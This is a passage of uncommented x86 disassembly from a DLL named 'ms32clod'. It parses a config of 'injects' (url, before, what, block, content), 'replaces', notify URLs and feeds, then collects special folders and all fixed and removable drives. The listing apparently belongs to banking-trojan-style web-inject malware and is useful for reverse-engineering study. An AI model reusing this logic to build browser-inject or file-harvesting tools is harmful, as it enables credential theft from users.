var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = dword ptr -400h
var_3FC = dword ptr -3FCh
var_3F8 = dword ptr -3F8h
var_3F4 = dword ptr -3F4h
var_3F0 = dword ptr -3F0h
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_3E4 = dword ptr -3E4h
var_3E0 = dword ptr -3E0h
var_3DC = dword ptr -3DCh
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = dword ptr -3CCh
var_3C8 = dword ptr -3C8h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = dword ptr -3B4h
var_3B0 = dword ptr -3B0h
var_3AC = dword ptr -3ACh
var_3A8 = dword ptr -3A8h
var_3A4 = dword ptr -3A4h
var_3A0 = dword ptr -3A0h
var_39C = dword ptr -39Ch
var_398 = dword ptr -398h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_38C = dword ptr -38Ch
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = byte ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = byte ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = byte ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = byte ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = byte ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = byte ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = byte ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_25C = dword ptr -25Ch
var_258 = byte ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
RootPathName = byte ptr -24Ch
var_24B = dword ptr -24Bh
var_247 = dword ptr -247h
var_243 = dword ptr -243h
var_23F = dword ptr -23Fh
var_23B = word ptr -23Bh
var_239 = byte ptr -239h
var_238 = byte ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
String2 = byte ptr -22Ch
lpString1 = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
Filename = byte ptr -118h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_1000878F
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 4C0h
lea ecx, [ebp+var_14]
call ??0_Container_base@std@@QAE@XZ_0 ; std::_Container_base::_Container_base(void)
mov [ebp+var_4], 0
lea ecx, [ebp+var_10]
call ??0_Container_base@std@@QAE@XZ_0 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 1
push 0FFh ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push offset aMs32clod_5 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 5Ch ; Ch
lea ecx, [ebp+Filename]
push ecx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax+1], 0
mov edx, [ebp+lpString2]
push edx ; lpString2
lea eax, [ebp+Filename]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+Filename]
push ecx ; Filename
call sub_100189B8
add esp, 4
test eax, eax
jz loc_10009FA9
lea edx, [ebp+var_124]
push edx ; int
push offset aConfig ; "config"
lea eax, [ebp+Filename]
push eax ; Filename
lea ecx, [ebp+var_254]
push ecx ; int
call sub_1001A057
add esp, 10h
mov [ebp+var_330], eax
mov edx, [ebp+var_330]
mov [ebp+var_334], edx
mov byte ptr [ebp+var_4], 2
mov eax, [ebp+var_334]
push eax
lea ecx, [ebp+var_14]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_254]
call sub_1001A728
cmp [ebp+var_124], 0
jnz loc_10009F7C
push 0
push offset aNotifyes ; "notifyes"
lea ecx, [ebp+var_258]
push ecx
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_338], eax
mov edx, [ebp+var_338]
mov [ebp+var_33C], edx
mov byte ptr [ebp+var_4], 3
mov eax, [ebp+var_33C]
push eax
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_258]
call sub_1001A728
push offset aNotify ; "notify"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_100088F6
; ---------------------------------------------------------------------------
loc_100088ED: ; CODE XREF: sub_1000878F+1F9�j
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
loc_100088F6: ; CODE XREF: sub_1000878F+15C�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_128]
jge loc_1000898D
push 0Ch ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_18]
mov Dst[ecx*4], eax
push 0Ch ; Size
push 0 ; Val
mov edx, [ebp+var_18]
mov eax, Dst[edx*4]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl ; "url"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aNotify_0 ; "notify"
mov edx, [ebp+var_18]
mov eax, Dst[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_25C], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_340], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_344], eax
mov eax, [ebp+var_18]
mov ecx, Dst[eax*4]
mov edx, [ebp+var_344]
mov [ecx+4], edx
jmp loc_100088ED
; ---------------------------------------------------------------------------
loc_1000898D: ; CODE XREF: sub_1000878F+170�j
push 0
push offset aThreadmasks ; "threadmasks"
lea eax, [ebp+var_260]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_348], eax
mov ecx, [ebp+var_348]
mov [ebp+var_34C], ecx
mov byte ptr [ebp+var_4], 4
mov edx, [ebp+var_34C]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_260]
call sub_1001A728
push offset aThreadmask ; "threadmask"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_100089FC
; ---------------------------------------------------------------------------
loc_100089F3: ; CODE XREF: sub_1000878F+354�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_100089FC: ; CODE XREF: sub_1000878F+262�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10008AE8
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_10034364[edx*4], eax
push 8 ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_10034364[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
push offset aMask ; "mask"
mov edx, [ebp+var_18]
push edx ; int
push offset aThreadmask_0 ; "threadmask"
mov eax, [ebp+var_18]
mov ecx, dword_10034364[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_264], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_350], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_354], eax
mov ecx, [ebp+var_18]
mov edx, dword_10034364[ecx*4]
mov eax, [ebp+var_354]
mov [edx], eax
push 1 ; int
push offset aWhat ; "what"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aThreadmask_1 ; "threadmask"
mov edx, [ebp+var_18]
mov eax, dword_10034364[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_268], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_358], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_35C], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034364[eax*4]
mov edx, [ebp+var_35C]
mov [ecx+4], edx
jmp loc_100089F3
; ---------------------------------------------------------------------------
loc_10008AE8: ; CODE XREF: sub_1000878F+276�j
push 0
push offset aReplaces ; "replaces"
lea eax, [ebp+var_26C]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_360], eax
mov ecx, [ebp+var_360]
mov [ebp+var_364], ecx
mov byte ptr [ebp+var_4], 5
mov edx, [ebp+var_364]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_26C]
call sub_1001A728
push offset aReplace ; "replace"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10008B57
; ---------------------------------------------------------------------------
loc_10008B4E: ; CODE XREF: sub_1000878F+4AF�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_10008B57: ; CODE XREF: sub_1000878F+3BD�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10008C43
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_10034AA4[edx*4], eax
push 8 ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_10034AA4[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
push offset aItem ; "item"
mov edx, [ebp+var_18]
push edx ; int
push offset aReplace_0 ; "replace"
mov eax, [ebp+var_18]
mov ecx, dword_10034AA4[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_270], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_368], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_36C], eax
mov ecx, [ebp+var_18]
mov edx, dword_10034AA4[ecx*4]
mov eax, [ebp+var_36C]
mov [edx], eax
push 1 ; int
push offset aWhat_0 ; "what"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aReplace_1 ; "replace"
mov edx, [ebp+var_18]
mov eax, dword_10034AA4[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_274], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_370], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_374], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034AA4[eax*4]
mov edx, [ebp+var_374]
mov [ecx+4], edx
jmp loc_10008B4E
; ---------------------------------------------------------------------------
loc_10008C43: ; CODE XREF: sub_1000878F+3D1�j
push 0
push offset aInjects ; "injects"
lea eax, [ebp+var_278]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_378], eax
mov ecx, [ebp+var_378]
mov [ebp+var_37C], ecx
mov byte ptr [ebp+var_4], 6
mov edx, [ebp+var_37C]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_278]
call sub_1001A728
push offset aInject ; "inject"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10008CB2
; ---------------------------------------------------------------------------
loc_10008CA9: ; CODE XREF: sub_1000878F+8C2�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_10008CB2: ; CODE XREF: sub_1000878F+518�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10009056
push 28h ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_10034464[edx*4], eax
push 28h ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl_0 ; "url"
mov edx, [ebp+var_18]
push edx ; int
push offset aInject_0 ; "inject"
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_27C], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_380], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_384], eax
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [ebp+var_384]
mov [edx], eax
push 1 ; int
push offset aBefore ; "before"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aInject_1 ; "inject"
mov edx, [ebp+var_18]
mov eax, dword_10034464[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_280], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_388], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_38C], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_38C]
mov [ecx+4], edx
push 1 ; int
push offset aWhat_1 ; "what"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_2 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+8]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_284], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_390], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_394]
mov [ecx+8], edx
push 0 ; int
push offset aBlock ; "block"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_3 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+0Ch]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_288], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_398], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_39C], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_39C]
mov [ecx+0Ch], edx
push 0 ; int
push offset aCheck ; "check"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_4 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+10h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_28C], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3A0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3A4], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3A4]
mov [ecx+10h], edx
push 0 ; int
push offset aQuan ; "quan"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_5 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+14h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_290], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3A8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3AC], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3AC]
mov [ecx+14h], edx
push 0 ; int
push offset aContent ; "content"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_6 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+18h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_294], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3B0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3B4], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3B4]
mov [ecx+18h], edx
push 0 ; int
push offset aT ; "t"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_7 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+1Ch]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_298], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3B8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3BC], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3BC]
mov [ecx+1Ch], edx
push 0 ; int
push offset aType ; "type"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_8 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+20h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_29C], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3C0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3C4], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3C4]
mov [ecx+20h], edx
push 0 ; int
push offset aNotify_1 ; "notify"
mov eax, [ebp+var_18]
push eax ; int
push offset aInject_9 ; "inject"
mov ecx, [ebp+var_18]
mov edx, dword_10034464[ecx*4]
mov eax, [edx+24h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2A0], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3C8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3CC], eax
mov eax, [ebp+var_18]
mov ecx, dword_10034464[eax*4]
mov edx, [ebp+var_3CC]
mov [ecx+24h], edx
jmp loc_10008CA9
; ---------------------------------------------------------------------------
loc_10009056: ; CODE XREF: sub_1000878F+52C�j
push 0
push offset aGlobal ; "global"
lea eax, [ebp+var_2A4]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_3D0], eax
mov ecx, [ebp+var_3D0]
mov [ebp+var_3D4], ecx
mov byte ptr [ebp+var_4], 7
mov edx, [ebp+var_3D4]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2A4]
call sub_1001A728
push 0 ; int
push 0 ; int
push 0 ; int
push offset aTime ; "time"
mov eax, dword_1004FDB0
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2A8], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3D8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3DC], eax
mov eax, [ebp+var_3DC]
mov dword_1004FDB0, eax
mov [ebp+lpString1], 0
push 0 ; int
push 0 ; int
push 0 ; int
push offset aTest ; "test"
mov ecx, [ebp+lpString1]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2AC], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3E0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3E4], eax
mov eax, [ebp+var_3E4]
mov [ebp+lpString1], eax
mov ecx, [ebp+lpString1]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov dword_1003712C, eax
push 0
push offset aFeeds ; "feeds"
lea edx, [ebp+var_2B0]
push edx
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_3E8], eax
mov eax, [ebp+var_3E8]
mov [ebp+var_3EC], eax
mov byte ptr [ebp+var_4], 8
mov ecx, [ebp+var_3EC]
push ecx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2B0]
call sub_1001A728
push offset aFeed ; "feed"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_100091B4
; ---------------------------------------------------------------------------
loc_100091AB: ; CODE XREF: sub_1000878F+A81�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_100091B4: ; CODE XREF: sub_1000878F+A1A�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_128]
jge short loc_10009212
push 1 ; int
push offset aUrl_1 ; "url"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aFeed_0 ; "feed"
mov edx, [ebp+var_18]
mov eax, dword_10057DD8[edx*4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2B4], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_3F0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_3F4], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_3F4]
mov dword_10057DD8[eax*4], ecx
jmp short loc_100091AB
; ---------------------------------------------------------------------------
loc_10009212: ; CODE XREF: sub_1000878F+A2E�j
push 0
push offset aFps ; "fps"
lea edx, [ebp+var_2B8]
push edx
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_3F8], eax
mov eax, [ebp+var_3F8]
mov [ebp+var_3FC], eax
mov byte ptr [ebp+var_4], 9
mov ecx, [ebp+var_3FC]
push ecx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2B8]
call sub_1001A728
push offset aFp ; "fp"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10009281
; ---------------------------------------------------------------------------
loc_10009278: ; CODE XREF: sub_1000878F+B4B�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_10009281: ; CODE XREF: sub_1000878F+AE7�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_128]
jge short loc_100092DC
push 0 ; int
push 0 ; int
mov ecx, [ebp+var_18]
push ecx ; int
push offset aFp_0 ; "fp"
mov edx, [ebp+var_18]
mov eax, dword_1005BED8[edx*4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2BC], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_400], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_404], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_404]
mov dword_1005BED8[eax*4], ecx
jmp short loc_10009278
; ---------------------------------------------------------------------------
loc_100092DC: ; CODE XREF: sub_1000878F+AFB�j
push 0
push offset aHlsts ; "hlsts"
lea edx, [ebp+var_2C0]
push edx
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_408], eax
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
mov byte ptr [ebp+var_4], 0Ah
mov ecx, [ebp+var_40C]
push ecx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2C0]
call sub_1001A728
push offset aHlst ; "hlst"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_1000934B
; ---------------------------------------------------------------------------
loc_10009342: ; CODE XREF: sub_1000878F+C15�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_1000934B: ; CODE XREF: sub_1000878F+BB1�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_128]
jge short loc_100093A6
push 0 ; int
push 0 ; int
mov ecx, [ebp+var_18]
push ecx ; int
push offset aHlst_0 ; "hlst"
mov edx, [ebp+var_18]
mov eax, dword_1005FED8[edx*4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2C4], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_410], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_414], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_414]
mov dword_1005FED8[eax*4], ecx
jmp short loc_10009342
; ---------------------------------------------------------------------------
loc_100093A6: ; CODE XREF: sub_1000878F+BC5�j
push 0
push 19h
lea edx, [ebp+String2]
push edx
push 0
call dword_1006A8F4 ; SHGetSpecialFolderPathA
lea eax, [ebp+String2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_128]
mov dword_1005FED8[ecx*4], eax
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_128]
mov ecx, dword_1005FED8[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_128]
add edx, 1
mov [ebp+var_128], edx
push 0
push 10h
lea eax, [ebp+String2]
push eax
push 0
call dword_1006A8F4 ; SHGetSpecialFolderPathA
lea ecx, [ebp+String2]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_128]
mov dword_1005FED8[edx*4], eax
lea eax, [ebp+String2]
push eax ; lpString2
mov ecx, [ebp+var_128]
mov edx, dword_1005FED8[ecx*4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, [ebp+var_128]
add eax, 1
mov [ebp+var_128], eax
push 0
push 5
lea ecx, [ebp+String2]
push ecx
push 0
call dword_1006A8F4 ; SHGetSpecialFolderPathA
lea edx, [ebp+String2]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_128]
mov dword_1005FED8[ecx*4], eax
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_128]
mov ecx, dword_1005FED8[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_128]
add edx, 1
mov [ebp+var_128], edx
call ds:GetLogicalDrives ; GetLogicalDrives
mov [ebp+var_234], eax
mov [ebp+var_230], 2
jmp short loc_100094F9
; ---------------------------------------------------------------------------
loc_100094EA: ; CODE XREF: sub_1000878F:loc_10009610�j
mov eax, [ebp+var_230]
add eax, 1
mov [ebp+var_230], eax
loc_100094F9: ; CODE XREF: sub_1000878F+D59�j
cmp [ebp+var_230], 20h
jge loc_10009615
mov edx, 1
mov ecx, [ebp+var_230]
shl edx, cl
mov eax, [ebp+var_234]
and eax, edx
test eax, eax
jz loc_10009610
mov [ebp+RootPathName], 0
xor ecx, ecx
mov [ebp+var_24B], ecx
mov [ebp+var_247], ecx
mov [ebp+var_243], ecx
mov [ebp+var_23F], ecx
mov [ebp+var_23B], cx
mov [ebp+var_239], cl
mov edx, [ebp+var_230]
add edx, 61h
mov [ebp+var_238], dl
movsx eax, [ebp+var_238]
push eax
push offset aC ; "%c:\\"
lea ecx, [ebp+RootPathName]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea edx, [ebp+RootPathName]
push edx ; lpRootPathName
call ds:GetDriveTypeA ; GetDriveTypeA
mov [ebp+var_250], eax
cmp [ebp+var_250], 2
jz short loc_100095A2
cmp [ebp+var_250], 3
jnz short loc_10009610
loc_100095A2: ; CODE XREF: sub_1000878F+E08�j
movsx eax, [ebp+var_238]
push eax
push offset aC? ; "%c:?"
lea ecx, [ebp+RootPathName]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea edx, [ebp+RootPathName]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_128]
mov dword_1005FED8[ecx*4], eax
lea edx, [ebp+RootPathName]
push edx ; lpString2
mov eax, [ebp+var_128]
mov ecx, dword_1005FED8[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_128]
add edx, 1
mov [ebp+var_128], edx
